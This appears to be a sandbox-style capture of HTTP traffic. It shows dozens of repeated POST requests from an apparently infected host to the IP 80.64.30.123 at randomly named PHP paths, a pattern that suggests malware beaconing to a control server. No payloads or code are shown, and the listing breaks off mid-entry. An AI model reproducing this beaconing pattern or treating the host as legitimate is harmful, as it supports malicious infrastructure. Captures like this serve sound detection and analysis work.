POST /php/5k2kgmqs.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:19 GMT
Content-Length: 88
POST

http://80.64.30.123/php/p8e3oqyqf1j427.php/

Remote address:

80.64.30.123:80

Request

POST /php/p8e3oqyqf1j427.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:22 GMT
Content-Length: 88
POST

http://80.64.30.123/php/ghf1.php/

Remote address:

80.64.30.123:80

Request

POST /php/ghf1.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:25 GMT
Content-Length: 88
POST

http://80.64.30.123/php/hmpco61wj0pvbh7ki.php/

Remote address:

80.64.30.123:80

Request

POST /php/hmpco61wj0pvbh7ki.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:28 GMT
Content-Length: 88
POST

http://80.64.30.123/php/ot4fogd1248u51yte.php/

Remote address:

80.64.30.123:80

Request

POST /php/ot4fogd1248u51yte.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:31 GMT
Content-Length: 88
POST

http://80.64.30.123/php/m2ab2n8ques.php/

Remote address:

80.64.30.123:80

Request

POST /php/m2ab2n8ques.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:34 GMT
Content-Length: 88
POST

http://80.64.30.123/php/y8jwke5g.php/

Remote address:

80.64.30.123:80

Request

POST /php/y8jwke5g.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:37 GMT
Content-Length: 88
POST

http://80.64.30.123/php/zsle3kvdi8jhndyaea.php/

Remote address:

80.64.30.123:80

Request

POST /php/zsle3kvdi8jhndyaea.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:40 GMT
Content-Length: 88
POST

http://80.64.30.123/php/tqz0vq8ncd3f3.php/

Remote address:

80.64.30.123:80

Request

POST /php/tqz0vq8ncd3f3.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:43 GMT
Content-Length: 88
POST

http://80.64.30.123/php/srsswm9.php/

Remote address:

80.64.30.123:80

Request

POST /php/srsswm9.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:47 GMT
Content-Length: 88
POST

http://80.64.30.123/php/0drwayd.php/

Remote address:

80.64.30.123:80

Request

POST /php/0drwayd.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:50 GMT
Content-Length: 88
POST

http://80.64.30.123/php/npt.php/

Remote address:

80.64.30.123:80

Request

POST /php/npt.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:52 GMT
Content-Length: 88
POST

http://80.64.30.123/php/mf9z5ymj7slr0jm.php/

Remote address:

80.64.30.123:80

Request

POST /php/mf9z5ymj7slr0jm.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:55 GMT
Content-Length: 88
POST

http://80.64.30.123/php/ra.php/

Remote address:

80.64.30.123:80

Request

POST /php/ra.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:58 GMT
Content-Length: 88
POST

http://80.64.30.123/php/p2ih5913w5a3pd262kss.php/

Remote address:

80.64.30.123:80

Request

POST /php/p2ih5913w5a3pd262kss.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:01 GMT
Content-Length: 88
POST

http://80.64.30.123/php/rv6katpdoiysnn.php/

Remote address:

80.64.30.123:80

Request

POST /php/rv6katpdoiysnn.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:04 GMT
Content-Length: 88
POST

http://80.64.30.123/php/vsdxb8qgh5tyu.php/

Remote address:

80.64.30.123:80

Request

POST /php/vsdxb8qgh5tyu.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:08 GMT
Content-Length: 88
POST

http://80.64.30.123/php/mlctavxdit9yh2z3scm0.php/

Remote address:

80.64.30.123:80

Request

POST /php/mlctavxdit9yh2z3scm0.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 888
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:08 GMT
Content-Length: 108
POST

http://80.64.30.123/php/gs1wtp.php/

Remote address:

80.64.30.123:80

Request

POST /php/gs1wtp.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:08 GMT
Transfer-Encoding: chunked
POST

http://80.64.30.123/php/bummr9uvuulkdceh2.php/

Remote address:

80.64.30.123:80

Request

POST /php/bummr9uvuulkdceh2.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:14 GMT
Content-Length: 88
POST

http://80.64.30.123/php/53jd.php/

Remote address:

80.64.30.123:80

Request

POST /php/53jd.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:17 GMT
Content-Length: 88
POST

http://80.64.30.123/php/c9at.php/

Remote address:

80.64.30.123:80

Request

POST /php/c9at.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:20 GMT
Content-Length: 88
POST

http://80.64.30.123/php/3n2fkcspe51o7xlz.php/

Remote address:

80.64.30.123:80

Request

POST /php/3n2fkcspe51o7xlz.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:23 GMT
Content-Length: 88
POST

http://80.64.30.123/php/u4anp4eacmudg.php/

Remote address:

80.64.30.123:80

Request

POST /php/u4anp4eacmudg.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:26 GMT
Content-Length: 88
POST

http://80.64.30.123/php/ydhhphpw42040oo2z.php/

Remote address:

80.64.30.123:80

Request

POST /php/ydhhphpw42040oo2z.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 90
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:55:29 GMT
Content-Length: 88
POST

http://80.64.30.123/php/ecjluwgn.php/

Remote address:

80.64.30.123:80

Request

POST /php/ecjluwgn.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:38 GMT
Content-Length: 24
POST

http://80.64.30.123/php/yr5cl0o864ren0hldfj1.php/

Remote address:

80.64.30.123:80

Request

POST /php/yr5cl0o864ren0hldfj1.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:44 GMT
Content-Length: 24
POST

http://80.64.30.123/php/o1174a87d9fzywge.php/

Remote address:

80.64.30.123:80

Request

POST /php/o1174a87d9fzywge.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:48 GMT
Content-Length: 24
POST

http://80.64.30.123/php/s5y181hswl53.php/

Remote address:

80.64.30.123:80

Request

POST /php/s5y181hswl53.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:52 GMT
Content-Length: 24
POST

http://80.64.30.123/php/96rfq76a4ohl.php/

Remote address:

80.64.30.123:80

Request

POST /php/96rfq76a4ohl.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:55 GMT
Content-Length: 24
POST

http://80.64.30.123/php/j3rmrll8bgpj16557l.php/

Remote address:

80.64.30.123:80

Request

POST /php/j3rmrll8bgpj16557l.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:58 GMT
Content-Length: 24
POST

http://80.64.30.123/php/l23qny.php/

Remote address:

80.64.30.123:80

Request

POST /php/l23qny.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:01 GMT
Content-Length: 24
POST

http://80.64.30.123/php/q2vc6j2s9bkg.php/

Remote address:

80.64.30.123:80

Request

POST /php/q2vc6j2s9bkg.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:54:04 GMT
Content-Length: 24
POST

http://80.64.30.123/php/rcd6ui7bx7r.php/

Remote address:

80.64.30.123:80

Request

